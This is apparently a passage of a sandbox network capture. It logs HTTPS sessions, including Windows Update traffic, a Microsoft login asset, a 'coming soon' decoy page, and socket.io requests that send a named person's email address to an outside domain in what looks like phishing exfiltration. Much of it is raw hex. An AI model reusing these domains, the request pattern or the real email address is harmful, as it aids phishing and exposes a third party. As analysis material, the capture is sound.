                                                                Data Ascii: \[E-LTqTXGQNXG1xE&,T$Lore*Uo"VYY#u(rE6lftE--~=;E_D(sT*b<Q?F0u`iI4%Xdjd`!9c1fhHG4j9q,ch|}/X_c#!wus5iFeq0Mc7B
                                                                2024-11-07 20:40:07 UTC1369INData Raw: 76 57 cd c1 5b 0b dc ba dd e2 c8 b5 30 de d8 68 78 ae e7 d5 df 59 58 fb 2f e6 df eb 2b 05 28 d5 47 fb f3 69 6c 55 ab ad f9 f7 5a d5 6a b5 da 42 bb 55 ad 5e 39 f6 75 f3 fd f7 b8 9e 8a 3c f7 9d f7 b8 5e 1c 7b ee dd 50 aa 7f 9a e5 f3 d7 ff 1d ab 56 5b 95 03 2a 20 b2 c8 39 d8 c7 17 b0 4b 7d 3a 41 d7 d3 9d f4 58 7a 36 bd 94 de 4c ef a7 cf 12 95 83 bb 35 9b ae 63 2d 9d fa e0 8b 08 3b 30 32 e6 1d 83 8a 73 d5 f7 31 4b 9d 34 3a f2 78 99 68 17 bb 05 bc e3 84 56 94 e3 02 a1 75 44 14 2b bb c7 91 69 a6 b6 7f ea ec 53 8b 39 6a 0e 29 fb 7b 2f 8e 8e dd 29 9f d0 98 e6 80 3d fd 5a c3 88 0d e3 61 86 11 6b 4c d7 b4 a7 01 6f 61 da 83 61 f8 1e c7 83 99 26 61 3c 9c 31 8d 3d 5c 07 93 43 8f 73 6e 3a 8e a9 b1 68 db e3 42 08 b7 6c b6 b6 85 ae 78 7b ef ee ed 63 ba 8f ef b7 eb 9b 1e
                                                                Data Ascii: vW[0hxYX/+(GilUZjBU^9u<^{PV[* 9K}:AXz6L5c-;02s1K4:xhVuD+iS9j){/)=ZakLoaa&a<1=\Csn:hBlx{c
                                                                2024-11-07 20:40:07 UTC1369INData Raw: bf f3 9c 0f e9 c6 fc 7d d0 00 1d bf 80 f9 ef c1 58 7e 1d 6f d9 00 a6 d0 3f 87 fa 9b bf 8c 01 9a 21 ab 17 f8 6f 46 d8 a3 15 da a6 8b f4 28 22 c4 62 82 0d f5 d2 90 86 20 b7 b1 35 3b c8 67 97 e6 b0 fa b5 c7 22 cd d2 a4 d7 17 7c 11 a1 53 c2 cd 8c 78 86 d2 f7 8d 63 8f 50 e3 bc fe 8a a2 18 fe a5 c1 d0 6c 2c cd bf b2 d4 68 02 cd c6 d2 62 43 82 14 5b 67 6f b9 56 ba d8 ab 33 1b 8b 4b 8d 0c 96 f4 e6 7b 9e 25 a5 e5 61 db b3 24 e6 3f 96 80 94 be 27 2d 4b 7a 9e f5 ed aa f5 3c 5f 5a 90 96 e7 49 dc d2 ca 7e e3 d4 15 34 57 7e 25 6b 35 d0 34 3d d7 94 f2 cc 19 29 4d d7 33 9b 68 5c ed 4b 29 a5 ff 1d 2f 36 a1 dd f2 be b3 22 bd de 49 e7 5b 45 5c ce 49 e9 06 b6 83 6d ba 48 77 d3 13 e8 b9 f4 46 bc 24 20 36 50 85 19 0c 03 b1 7a c6 51 14 e5 68 96 f4 a5 ed e1 32 17 ba d7 14 5c f0
                                                                Data Ascii: }X~o?!oF("b 5;g"|SxcPl,hbC[goV3K{%a$?'-Kz<_ZI~4W~%k54=)M3h\K)/6"I[E\ImHwF$ 6PzQh2\
                                                                2024-11-07 20:40:07 UTC1369INData Raw: 75 8e 8f 01 00 92 fe 60 54 f4 07 49 8f 44 00 14 6e 44 e3 31 8d a2 ac f5 87 86 6e cc a7 00 af 4a ce 9e b8 f6 da 33 67 56 ca 06 6d 1d 10 9f dd 40 60 c8 39 dd a6 74 9b 72 8e 0c b0 71 27 df 3f 79 c7 9d 17 ce c7 dd 21 0f 72 50 ff 3d c9 11 e8 39 c6 38 65 ec 64 a3 3f 6a 51 c6 19 05 a0 f9 f8 0e cc 27 e3 9c 02 3d 4f 39 a3 40 e9 61 a3 3f 6c 53 ce 18 8b 39 ea 3d bc fa 0c f6 e0 69 32 22 d7 13 12 90 c8 50 16 4c 2e aa 04 c3 5d 80 9e 61 ac 67 67 d2 70 96 0e ea b1 6d 10 d2 d4 57 5e 0a 39 81 77 d8 fa 70 d0 ef 0f 0e 95 65 d4 8f 6a 00 ad 1c 5b 7d e7 ad d0 6c 4e 83 4a f3 ec 5f b3 ad c3 7e bf df 3f d4 7b e5 6a e5 d8 fa 3b 6e 85 66 63 6a be 54 04 4f 83 d8 dc d9 39 38 dc d9 d9 14 00 ea 47 b4 6d 6b ad 3f 79 ee ce ad 8d f5 a1 b4 6d cb a2 c7 47 bf 3f cf c3 83 42 b7 8f 37 36 72 69
                                                                Data Ascii: u`TIDnD1nJ3gVm@`9trq'?y!rP=98ed?jQ'=O9@a?lS9=i2"PL.]aggpmW^9wpej[}lNJ_~?{j;nfcjTO98Gmk?ymG?B76ri


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                24192.168.2.16497414.175.87.197443
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:40:07 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=UtDRYDSeH2uSZlR&MD=1X3GNSgS HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                Host: slscr.update.microsoft.com
                                                                2024-11-07 20:40:07 UTC560INHTTP/1.1 200 OK
                                                                Cache-Control: no-cache
                                                                Pragma: no-cache
                                                                Content-Type: application/octet-stream
                                                                Expires: -1
                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                MS-CorrelationId: 5d0e81b9-e4d0-4a8c-a1f8-ad19df754460
                                                                MS-RequestId: 78d5ca53-6b76-41a8-98ac-20ea48a965e6
                                                                MS-CV: 9jIN0cJuBU2myaQY.0
                                                                X-Microsoft-SLSClientCache: 2880
                                                                Content-Disposition: attachment; filename=environment.cab
                                                                X-Content-Type-Options: nosniff
                                                                Date: Thu, 07 Nov 2024 20:40:07 GMT
                                                                Connection: close
                                                                Content-Length: 24490
                                                                2024-11-07 20:40:07 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                2024-11-07 20:40:07 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                25192.168.2.1649743152.199.21.1754436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:40:07 UTC424OUTGET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1
                                                                Host: aadcdn.msftauth.net
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:40:07 UTC738INHTTP/1.1 200 OK
                                                                Access-Control-Allow-Origin: *
                                                                Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                Age: 19667179
                                                                Cache-Control: public, max-age=31536000
                                                                Content-MD5: 1jQlecEJaGhFO2st5KXLhg==
                                                                Content-Type: image/svg+xml
                                                                Date: Thu, 07 Nov 2024 20:40:07 GMT
                                                                Etag: 0x8DB5C3F4AC59B47
                                                                Last-Modified: Wed, 24 May 2023 10:11:51 GMT
                                                                Server: ECAcc (lhc/78BB)
                                                                Vary: Accept-Encoding
                                                                X-Cache: HIT
                                                                x-ms-blob-type: BlockBlob
                                                                x-ms-lease-status: unlocked
                                                                x-ms-request-id: 2ee1dbb1-b01e-00dc-3276-7e9a59000000
                                                                x-ms-version: 2009-09-19
                                                                Content-Length: 1636
                                                                Connection: close
                                                                2024-11-07 20:40:07 UTC1636INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 38 2c 31 34 48 31 30 56 33 34 48 33 38 56 31 34 6d 32 2c 32 32 48 38 56 31 32 48 34 30 56 33 36 4d 31 37 2e 36 38 38 2c 31 38 2e 38 56 32 38 2e 38 32 38 48 31 35 2e 35 33 31 56 32 31 2e 32 33 34 61 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 2e 36 37 32 2e 34 33 6c 2d 2e 32 36 36 2e 31 31 37 61
                                                                Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                26192.168.2.1649751188.114.97.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:40:08 UTC351OUTGET /favicon.ico HTTP/1.1
                                                                Host: kwiktestaust.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:40:08 UTC848INHTTP/1.1 200 OK
                                                                Date: Thu, 07 Nov 2024 20:40:08 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT
                                                                Vary: Accept-Encoding
                                                                Cache-Control: max-age=14400
                                                                CF-Cache-Status: HIT
                                                                Age: 1
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KRfh5SQIVI50r8E21ujxwzJoHXS6Er3hvgw93C8H2EDFjb5nwwFMvuJZ%2BwwSKWL2DC0pUcT1jT9Cq3x6zMUW%2BFoD%2FgVGWVvKDa6osm84lRW3qDlKab8BwlLevFhpxAVJxQn4"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8df022fcbba7ddad-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1264&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=929&delivery_rate=2344939&cwnd=175&unsent_bytes=0&cid=7ab972949ea31fd2&ts=171&x=0"
                                                                2024-11-07 20:40:08 UTC521INData Raw: 31 30 38 35 0d 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 43 4f 4d 49 4e 47 20 53 4f 4f 4e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 67 69 6d 67 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 69 64 64 6c 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 43 4f 4d 49 4e 47 20 53 4f 4f 4e 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 3c 68 72 3e 0a 20 20 20 20 20 20 20 20 3c 70 20 69 64 3d 22 64 65 6d 6f 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 33 30 70 78 22 3e 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 62 6f 64 79 2c 0a 20 20 20
                                                                Data Ascii: 1085<html> <head> <title>COMING SOON</title> <body> <div class="bgimg"> <div class="middle"> <h1>COMING SOON</h1> <hr> <p id="demo" style="font-size:30px"></p> </div> </div> <style> body,
                                                                2024-11-07 20:40:08 UTC1369INData Raw: 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6f 75 72 69 65 72 20 4e 65 77 22 2c 20 43 6f 75 72 69 65 72 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 70 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 74 6f 70 6c 65 66 74 20 7b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 74 6f 70 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 6c 65 66 74 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 62 6f 74 74 6f 6d 6c 65 66 74 20 7b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 62 6f 74
                                                                Data Ascii: color: white; font-family: "Courier New", Courier, monospace; font-size: 25px; } .topleft { position: absolute; top: 0; left: 16px; } .bottomleft { position: absolute; bot
                                                                2024-11-07 20:40:08 UTC1369INData Raw: 20 31 30 30 30 29 3b 0a 09 09 77 69 6e 64 6f 77 2e 6d 6f 62 69 6c 65 43 68 65 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 09 20 20 6c 65 74 20 63 68 65 63 6b 20 3d 20 66 61 6c 73 65 3b 0a 09 09 20 20 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 2f 28 61 6e 64 72 6f 69 64 7c 62 62 5c 64 2b 7c 6d 65 65 67 6f 29 2e 2b 6d 6f 62 69 6c 65 7c 61 76 61 6e 74 67 6f 7c 62 61 64 61 5c 2f 7c 62 6c 61 63 6b 62 65 72 72 79 7c 62 6c 61 7a 65 72 7c 63 6f 6d 70 61 6c 7c 65 6c 61 69 6e 65 7c 66 65 6e 6e 65 63 7c 68 69 70 74 6f 70 7c 69 65 6d 6f 62 69 6c 65 7c 69 70 28 68 6f 6e 65 7c 6f 64 29 7c 69 72 69 73 7c 6b 69 6e 64 6c 65 7c 6c 67 65 20 7c 6d 61 65 6d 6f 7c 6d 69 64 70 7c 6d 6d 70 7c 6d 6f 62 69 6c 65 2e 2b 66 69 72 65 66 6f 78 7c 6e 65 74 66 72 6f 6e
                                                                Data Ascii: 1000);window.mobileCheck = function() { let check = false; (function(a){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfron
                                                                2024-11-07 20:40:08 UTC978INData Raw: 7c 6e 7a 70 68 7c 6f 32 69 6d 7c 6f 70 28 74 69 7c 77 76 29 7c 6f 72 61 6e 7c 6f 77 67 31 7c 70 38 30 30 7c 70 61 6e 28 61 7c 64 7c 74 29 7c 70 64 78 67 7c 70 67 28 31 33 7c 5c 2d 28 5b 31 2d 38 5d 7c 63 29 29 7c 70 68 69 6c 7c 70 69 72 65 7c 70 6c 28 61 79 7c 75 63 29 7c 70 6e 5c 2d 32 7c 70 6f 28 63 6b 7c 72 74 7c 73 65 29 7c 70 72 6f 78 7c 70 73 69 6f 7c 70 74 5c 2d 67 7c 71 61 5c 2d 61 7c 71 63 28 30 37 7c 31 32 7c 32 31 7c 33 32 7c 36 30 7c 5c 2d 5b 32 2d 37 5d 7c 69 5c 2d 29 7c 71 74 65 6b 7c 72 33 38 30 7c 72 36 30 30 7c 72 61 6b 73 7c 72 69 6d 39 7c 72 6f 28 76 65 7c 7a 6f 29 7c 73 35 35 5c 2f 7c 73 61 28 67 65 7c 6d 61 7c 6d 6d 7c 6d 73 7c 6e 79 7c 76 61 29 7c 73 63 28 30 31 7c 68 5c 2d 7c 6f 6f 7c 70 5c 2d 29 7c 73 64 6b 5c 2f 7c 73 65 28 63 28
                                                                Data Ascii: |nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(
                                                                2024-11-07 20:40:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                27192.168.2.1649753188.114.97.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:40:11 UTC559OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PC8Mnmw HTTP/1.1
                                                                Host: grastoonm3vides.com
                                                                Connection: keep-alive
                                                                Accept: */*
                                                                Access-Control-Request-Method: GET
                                                                Access-Control-Request-Headers: auth_uid,session_email
                                                                Origin: https://kwiktestaust.com
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://kwiktestaust.com/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:40:11 UTC910INHTTP/1.1 204 No Content
                                                                Date: Thu, 07 Nov 2024 20:40:11 GMT
                                                                Content-Length: 0
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                                Vary: Access-Control-Request-Headers
                                                                Access-Control-Allow-Headers: auth_uid,session_email
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UBTPNJmIHG03n%2FwGXDnq8yADfP0KZthWzpNmXlALMUNo8L82RI8Sqr3376zLCD3bS%2F1B4CCX3KdCZ9hjHb%2FoEHIw9W8bCflnyp7QaILw6IfjqxpSQh5G6qwejSE2bdWGheILMTcv"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8df0230e696b45f6-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1306&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1137&delivery_rate=2225980&cwnd=238&unsent_bytes=0&cid=fbd78fc11b550f90&ts=168&x=0"


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                28192.168.2.1649755188.114.97.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:40:12 UTC669OUTGET /socket.io/?EIO=4&transport=polling&t=PC8Mnmw HTTP/1.1
                                                                Host: grastoonm3vides.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                Accept: */*
                                                                Auth_UID: USER21102024U52102117
                                                                Session_Email: akash.desai@lcatterton.com
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Origin: https://kwiktestaust.com
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://kwiktestaust.com/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:40:51 UTC927INHTTP/1.1 522
                                                                Date: Thu, 07 Nov 2024 20:40:51 GMT
                                                                Content-Type: text/plain; charset=UTF-8
                                                                Content-Length: 15
                                                                Connection: close
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zUeyXSpIrIbIxQu4H6KpBUxEoo4HoXK1w0MDJUvyOqIbCmTweH5rPugZZ%2BRVQnu3RgRx85iUZrgq7vPk7kX1LNqUL4ulmJ85enhxWObrRFIhttu90lnczCo9vDdyT%2Bh6lJVW5xvm"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                X-Frame-Options: SAMEORIGIN
                                                                Referrer-Policy: same-origin
                                                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                Server: cloudflare
                                                                CF-RAY: 8df023172f7ee73b-DEN
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=19220&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1247&delivery_rate=150285&cwnd=32&unsent_bytes=0&cid=40912134ead6a90c&ts=38899&x=0"
                                                                2024-11-07 20:40:51 UTC15INData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                                Data Ascii: error code: 522


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                29192.168.2.1649757188.114.97.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:40:32 UTC559OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PC8Ms_L HTTP/1.1
                                                                Host: grastoonm3vides.com
                                                                Connection: keep-alive
                                                                Accept: */*
                                                                Access-Control-Request-Method: GET
                                                                Access-Control-Request-Headers: auth_uid,session_email
                                                                Origin: https://kwiktestaust.com
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://kwiktestaust.com/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:40:52 UTC909INHTTP/1.1 204 No Content
                                                                Date: Thu, 07 Nov 2024 20:40:52 GMT
                                                                Content-Length: 0
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                                Vary: Access-Control-Request-Headers
                                                                Access-Control-Allow-Headers: auth_uid,session_email
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0bAgrUYhREf%2FklDM28LKM4sfayXXdYhfW869DloYMFmZhju7q0Nrxp4EPFkrbmpdKu9WRjJtWshp7ISDDILhO4SliqyNVdkeppZqGKJOt2VkqPMSSnxfFXkZCNivxIVeHei%2FNyAn"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8df023943ecc5209-DEN
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=18800&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1137&delivery_rate=154034&cwnd=32&unsent_bytes=0&cid=542dc2f9713b9cca&ts=19805&x=0"


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                30192.168.2.16497584.175.87.197443
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:40:45 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=UtDRYDSeH2uSZlR&MD=1X3GNSgS HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                Host: slscr.update.microsoft.com
                                                                2024-11-07 20:40:45 UTC560INHTTP/1.1 200 OK
                                                                Cache-Control: no-cache
                                                                Pragma: no-cache
                                                                Content-Type: application/octet-stream
                                                                Expires: -1
                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                MS-CorrelationId: 27e501a7-c88b-4b62-82e4-05d18c073121
                                                                MS-RequestId: 4d577ee1-3e34-4b50-92d7-3422423cecd3
                                                                MS-CV: R93hMCWhpEGH+REz.0
                                                                X-Microsoft-SLSClientCache: 1440
                                                                Content-Disposition: attachment; filename=environment.cab
                                                                X-Content-Type-Options: nosniff
                                                                Date: Thu, 07 Nov 2024 20:40:44 GMT
                                                                Connection: close
                                                                Content-Length: 30005
